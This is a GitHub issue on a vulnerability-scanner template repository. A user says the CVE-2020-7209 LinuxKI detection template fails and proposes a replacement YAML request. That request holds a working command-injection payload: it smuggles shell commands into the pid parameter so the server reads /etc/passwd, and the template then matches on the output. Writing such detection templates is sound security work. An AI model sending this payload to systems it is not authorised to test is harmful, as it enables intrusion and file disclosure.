### ISSUE TITLE
 Problem CVE-2020-7209 LinuxKI Toolset 6.01 RCE

### ISSUE THREAD

**Issue by pikpikcu** [projectdiscovery/nuclei-templates#382]
![CVE-2020-7209](https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/cves/CVE-2020-7209.yaml)
hello @bauthard @dwisiswant0  i'm trying to run CVE-2020-7209 and it doesn't get any valid results. can you fix it. i tried to replace the source code with this.
https://twitter.com/sec715/status/1300633139736272896?s=20
```yaml
requests:
  - method: GET
    path:
      - "{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body

```
